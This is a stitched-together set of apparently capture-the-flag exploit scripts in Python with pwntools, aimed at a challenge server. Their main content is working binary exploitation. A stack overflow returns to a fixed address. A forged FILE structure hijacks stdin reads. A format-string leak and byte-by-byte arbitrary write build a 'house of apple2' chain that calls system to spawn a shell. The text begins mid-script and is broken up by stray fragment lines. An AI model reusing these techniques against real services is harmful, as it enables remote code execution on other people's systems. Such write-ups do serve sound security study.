# fixed code address in the (non-PIE, presumably) binary -- verify the
# target it points at with objdump before reuse.
pay = flat([
    b'a' * 0x40,
    money + 0x10,
    0x401533
])
equip(3)
sa("You want to say something to the village chief: \n", pay)
ia()
magic
fileno = 0 会从标准输入读,而输入的数据又会先拷贝到缓冲区。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-28 15:59:30
'''
from pwncli import *
# Target selection: local binary and remote endpoint for this challenge.
filename = "154333_io"
# glibc matching the remote. Loaded below, but this exploit never reads
# ``libc.sym``: it addresses the binary with fixed constants instead.
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/libc6_2.39-0ubuntu8.5_amd64/usr/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30180
# Only consulted by start() in DOCKER mode. Left empty here, so that mode
# cannot locate a process: an empty proc_name only matches a row whose CMD
# is empty.
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb script used by start(): break at main, then continue twice. The two
# "set" lines point gdb at the debug symbols and sources of the libc above.
gs = '''
b main
# b read
# b *0x401825
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/libc6-dbg_2.39-0ubuntu8.5_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/glibc-source_2.39-0ubuntu8.5_all/usr/src/glibc/glibc-2.39
c
c
'''
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
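def start():
    """Open the target tube selected by the pwntools command-line switches.

    GDB    -> run the local binary under gdb with the ``gs`` script.
    REMOTE -> plain TCP connection to ``host``:``port``.
    DOCKER -> connect to ``host``:``port``, then attach a root gdb (via sudo)
              to the process called ``proc_name`` inside ``container_id``.
    (none) -> run the local binary without a debugger.

    Returns the pwntools tube; the exploit binds it to ``p``.
    Raises RuntimeError in DOCKER mode when no process in the container
    matches ``proc_name`` (the original indexed an empty list and died with
    an IndexError) or when the interactive selection is out of range.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    # Imported lazily so the docker SDK is only required for DOCKER mode.
    import docker
    import tempfile
    from os import path

    # Connect first so the per-connection service process exists when the
    # container is enumerated.
    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    top = container.top()
    rows = [dict(zip(top['Titles'], row)) for row in top['Processes']]

    # Match on the basename of the first word of CMD. A blank or
    # whitespace-only CMD yields '' (the original raised IndexError on the
    # whitespace-only case).
    candidates = []
    for row in rows:
        argv = row.get('CMD', '').split()
        exe = path.basename(argv[0]) if argv else ''
        if exe == proc_name:
            candidates.append(row)
    if not candidates:
        raise RuntimeError(
            f"no process named {proc_name!r} found in container {container_id!r}")

    idx = 0
    if len(candidates) > 1:
        for i, row in enumerate(candidates):
            print(f"{i} => {row}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(candidates):
            raise RuntimeError(
                f"selection {idx} out of range 0..{len(candidates) - 1}")

    # gdb reads the script by path after this function returns, so the file
    # must outlive the ``with`` (delete=False); its first line makes gdb
    # remove it once read. NamedTemporaryFile creates it owner-only, which
    # matters because gdb is started under sudo.
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', suffix='.gdb',
                                     mode='w', delete=False) as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
    print(tmp.name)
    run_in_new_terminal(
        ["sudo", "gdb", "-p", candidates[idx]['PID'], "-x", tmp.name])
    return p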
# 0x0 _flags
# 0x8 _IO_read_ptr
# 0x10 _IO_read_end
# 0x18 _IO_read_base
# 0x20 _IO_write_base
# 0x28 _IO_write_ptr
# 0x30 _IO_write_end
# 0x38 _IO_buf_base
# 0x40 _IO_buf_end
# 0x48 _IO_save_base
# 0x50 _IO_backup_base
# 0x58 _IO_save_end
# 0x60 _markers
# 0x68 _chain
# 0x70 _fileno
# 0x74 _flags2
# 0x78 _old_offset
# 0x80 _cur_column
# 0x82 _vtable_offset
# 0x83 _shortbuf
# 0x88 _lock
# //IO_FILE_complete
# 0x90 _offset
# 0x98 _codecvt
# 0xa0 _wide_data
# 0xa8 _freeres_list
# 0xb0 _freeres_buf
# 0xb8 __pad5
# 0xc0 _mode
# 0xc4 _unused2
# 0xd8 vtable
# Fixed addresses inside the binary (so it is presumably non-PIE/static).
# ``deadbeaf`` is not referenced anywhere below.
magic = 0x4C72F0
deadbeaf = 0x40188b
_IO_file_jumps = 0x4c6fa0
# Forge a FILE whose buffer is the 0x21-byte window at ``magic`` and whose
# descriptor is stdin: per the author's note above, a read through it pulls
# our input straight into that window. Field offsets: see the table above.
f = IO_FILE_plus_struct()
f.fileno = 0
f.flags = 0xfbad0000
f._IO_read_base = magic
# read_ptr == read_end: the read buffer reads as empty, presumably so the
# next read goes to the descriptor instead of the buffer.
f._IO_read_ptr = f._IO_read_end = magic + 0x21
f._IO_buf_base = magic
f._IO_buf_end = magic + 0x21
# NOTE(review): the next four fields sit at offsets >= 0x88 per the table
# above, but only bytes(f)[:0x78] is sent below, so they never reach the
# target and are effectively dead assignments. ``chain`` (0x68) is sent.
f._wide_data = 0x4c5600
f._offset = 0xffffffffffffffff
f._lock = 0x4ce860
f.vtable = _IO_file_jumps
f.chain = 0x4c5160
p = start()


# Short wrappers over the tube ``p`` so the exploit body stays terse.
def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def sla(x, y):
    """Send line ``y`` once the prompt ``x`` has been received."""
    return p.sendlineafter(x, y)


def sa(x, y):
    """Send ``y`` (no trailing newline) once the prompt ``x`` has been received."""
    return p.sendafter(x, y)


def ru(x):
    """Receive up to and including ``x``."""
    return p.recvuntil(x)


def r(x):
    """Receive ``x`` bytes."""
    return p.recv(x)


def rl(x):
    """Receive one line and keep only its first ``x`` bytes."""
    return p.recvline()[:x]


def s(x):
    """Send raw bytes ``x``."""
    return p.send(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return p.sendline(x)


def itob(x):
    """Integer -> decimal ASCII bytes, the form the menus expect."""
    return str(x).encode()


def su(x):
    """Log ``x`` at success level."""
    return p.success(x)


def u64_ex(x):
    """Unpack a leak of up to 8 bytes, zero-padding on the right."""
    return u64(x.ljust(8, b'\0'))
# Only the first 0x78 bytes of the forged FILE are delivered (through
# _fileno/_flags2 per the table above); everything from _lock onwards keeps
# whatever the target already holds.
sa("> ", bytes(f)[:0x78])
# 32 bytes of marker, presumably the value the binary compares against
# (note the spelling BEAF, not BEEF). They arrive through the redirected
# read into the ``magic`` window, which is 0x21 bytes, so 32 fit.
sa("And then...", p32(0xDEADBEAF) * 8)
ia()
short or out
house of apple2。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-28 19:07:28
'''
from pwncli import *
# Target selection: local binary and remote endpoint for this challenge.
filename = "pwn_patched"
# glibc matching the remote; used for ``libc.sym["system"]`` and the gdb
# source paths. The raw offsets used further down (vtable, list pointer)
# are tied to this exact build.
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6_2.31-0ubuntu9.17_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30192
# Only consulted by start() in DOCKER mode. Left empty here, so that mode
# cannot locate a process: an empty proc_name only matches a row whose CMD
# is empty.
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb script used by start(): break at main, then continue twice. The two
# "set" lines point gdb at the debug symbols and sources of the libc above.
gs = '''
b main
# b *(0x12FF + 0x555555554000)
# b free
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6-dbg_2.31-0ubuntu9.17_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/glibc-source_2.31-0ubuntu9.17_all/usr/src/glibc/glibc-2.31
c
c
'''
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
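def start():
    """Open the target tube selected by the pwntools command-line switches.

    GDB    -> run the local binary under gdb with the ``gs`` script.
    REMOTE -> plain TCP connection to ``host``:``port``.
    DOCKER -> connect to ``host``:``port``, then attach a root gdb (via sudo)
              to the process called ``proc_name`` inside ``container_id``.
    (none) -> run the local binary without a debugger.

    Returns the pwntools tube; the exploit binds it to ``p``.
    Raises RuntimeError in DOCKER mode when no process in the container
    matches ``proc_name`` (the original indexed an empty list and died with
    an IndexError) or when the interactive selection is out of range.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    # Imported lazily so the docker SDK is only required for DOCKER mode.
    import docker
    import tempfile
    from os import path

    # Connect first so the per-connection service process exists when the
    # container is enumerated.
    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    top = container.top()
    rows = [dict(zip(top['Titles'], row)) for row in top['Processes']]

    # Match on the basename of the first word of CMD. A blank or
    # whitespace-only CMD yields '' (the original raised IndexError on the
    # whitespace-only case).
    candidates = []
    for row in rows:
        argv = row.get('CMD', '').split()
        exe = path.basename(argv[0]) if argv else ''
        if exe == proc_name:
            candidates.append(row)
    if not candidates:
        raise RuntimeError(
            f"no process named {proc_name!r} found in container {container_id!r}")

    idx = 0
    if len(candidates) > 1:
        for i, row in enumerate(candidates):
            print(f"{i} => {row}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(candidates):
            raise RuntimeError(
                f"selection {idx} out of range 0..{len(candidates) - 1}")

    # gdb reads the script by path after this function returns, so the file
    # must outlive the ``with`` (delete=False); its first line makes gdb
    # remove it once read. NamedTemporaryFile creates it owner-only, which
    # matters because gdb is started under sudo.
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', suffix='.gdb',
                                     mode='w', delete=False) as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
    print(tmp.name)
    run_in_new_terminal(
        ["sudo", "gdb", "-p", candidates[idx]['PID'], "-x", tmp.name])
    return p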
p = start()


# Short wrappers over the tube ``p`` so the exploit body stays terse.
def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def sla(x, y):
    """Send line ``y`` once the prompt ``x`` has been received."""
    return p.sendlineafter(x, y)


def sa(x, y):
    """Send ``y`` (no trailing newline) once the prompt ``x`` has been received."""
    return p.sendafter(x, y)


def ru(x):
    """Receive up to and including ``x``."""
    return p.recvuntil(x)


def r(x):
    """Receive ``x`` bytes."""
    return p.recv(x)


def rl(x):
    """Receive one line and keep only its first ``x`` bytes."""
    return p.recvline()[:x]


def s(x):
    """Send raw bytes ``x``."""
    return p.send(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return p.sendline(x)


def itob(x):
    """Integer -> decimal ASCII bytes, the form the menus expect."""
    return str(x).encode()


def su(x):
    """Log ``x`` at success level."""
    return p.success(x)


def u64_ex(x):
    """Unpack a leak of up to 8 bytes, zero-padding on the right."""
    return u64(x.ljust(8, b'\0'))
def send_(pay):
    """Push one format-string payload through the length/content prompts.

    The declared length is always 32 and at most the first 0x20 bytes of
    ``pay`` are transmitted; a shorter payload (the 13-byte leak below) is
    sent as-is, unpadded.
    """
    sla("length: \n", itob(32))
    sa("content: \n", pay[:0x20])
# Probing payload used while locating the interesting printf arguments:
# b"%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p"
# One-shot leak: argument 1 is a stack pointer, argument 3 a libc pointer,
# argument 51 a pointer into the binary. The offsets subtracted below come
# from the author's debugging against the bundled libc/binary.
pay = b"%1$p%3$p%51$p"
# Argument 8 is where our input buffer starts on printf's argument list;
# that is why write() below targets %11$ with its pointer at payload
# offset 0x18 (8 + 0x18/8 == 11).
send_(pay)
# Each %p of a user-space pointer prints as "0x" plus 12 hex digits = 14 bytes.
stack_addr = int(r(14).decode(), 16)
libc_addr = int(r(14).decode(), 16) - 0x1131f2 + 0x5000
main_addr = int(r(14).decode(), 16) - 0x122f
# Scratch area (author's label: bss) for the forged structures below.
bss_addr = main_addr + 0x4020 + 0x100
# Not used anywhere below -- leftovers from an earlier approach.
target = stack_addr + 0x138
one_gad = 0xe3afe + libc_addr
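def _hhn_payload(addr, byte):
    """Build one 0x20-byte format-string payload storing ``byte`` at ``addr``.

    Layout: "%<byte>c%11$hhn" (or just "%11$hhn" for a zero byte, which must
    print nothing), zero-padded to 0x18, then the target pointer, which is
    printf argument 11 for this binary.
    """
    if byte:
        fmt = b"%" + str(byte).encode() + b"c%11$hhn"
    else:
        fmt = b"%11$hhn"
    return fmt.ljust(0x18, b'\0') + p64(addr)


def write(addr, data, cnt=8):
    """Store the low ``cnt`` bytes of ``data`` at ``addr`` via %hhn, one per round.

    Each byte costs one ``send_`` round trip; ``addr`` advances by one each
    time, so ``cnt=8`` writes a full little-endian qword.

    Fix vs. the original: the "print nothing" payload was chosen only when the
    whole *remaining* value was zero, so a zero byte below non-zero higher
    bytes (e.g. data=0x0100) was emitted as "%0c%11$hhn" -- which prints one
    character and stores 1, corrupting roughly 1 in 256 address bytes. The
    choice is now made on the byte actually being written. A non-positive
    ``cnt`` writes nothing (the original recursed without bound for negatives).
    """
    for i in range(cnt):
        send_(_hhn_payload(addr + i, (data >> (8 * i)) & 0xff))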
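def super_write(addr, pay):
    """Write the whole of ``pay`` to ``addr`` through ``write`` in 8-byte chunks.

    Returns the address just past the last byte written (``addr`` itself for
    an empty payload) so calls can be chained; the original only returned
    ``addr`` for the empty case and ``None`` otherwise, which no caller used.

    Fix vs. the original: a trailing chunk shorter than 8 bytes made ``u64``
    raise. It is now zero-padded via ``u64_ex`` and ``write`` is told the
    real byte count, so nothing past the payload is touched. Every caller in
    this script passes a multiple of 8, so their behaviour is unchanged.
    """
    for off in range(0, len(pay), 8):
        chunk = pay[off:off + 8]
        write(addr + off, u64_ex(chunk), cnt=len(chunk))
    return addr + len(pay)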
# Forged FILE (author's label above: house of apple2). Only the fields the
# chosen path inspects are set; everything else stays zero.
f = IO_FILE_plus_struct()
# vtable is a libc address (presumably _IO_wfile_jumps -- TODO confirm
# 0x1e8f60 against the bundled libc); _wide_data points at the fake block
# written to bss+0x100 below.
f.vtable = libc_addr + 0x1e8f60
f._wide_data = bss_addr + 0x100
# write_ptr > write_base, presumably so the flush path treats the stream
# as having pending output.
f._IO_write_ptr = 0x2
f._IO_write_base = 0x1
f._mode = 0xffffffff
# The first 0x10 bytes (_flags and _IO_read_ptr per the offset table) are
# replaced by a flags word followed by ";sh\0": when the FILE address is
# later handed to system() as the command string, the flag bytes form a
# junk word and ";sh" starts a shell (inferred from the layout; confirm).
super_write(bss_addr, (p32(0xfffff7f5) + b";sh\x00").ljust(0x10, b'\0') + bytes(f)[0x10:])
# C: a fake vtable whose slot at +0x68 is system.
C = b'\x00' * 0x68 + p64(libc_addr + libc.sym["system"])
# B: the fake _wide_data block; +0x20 holds 1 and +0xe0 points at C
# (presumably the _wide_vtable slot).
B = (b'\x00' * 0x20 + b'\x01').ljust(0xe0, b'\0') + p64(bss_addr + 0x200)
super_write(bss_addr + 0x100, B)
super_write(bss_addr + 0x200, C)
# Make the libc pointer at 0x1ed5a0 (presumably _IO_list_all for this glibc)
# reference the forged FILE so the stream walk on exit reaches it.
write(libc_addr + 0x1ed5a0, bss_addr)
# Give the many one-byte format-string rounds above time to be consumed
# before sending the trigger.
sleep(3)
# Presumably the input that makes the program leave its loop and exit/flush.
sl(b"19260817")
su(hex(stack_addr))
su(hex(libc_addr))
su(hex(main_addr))
ia()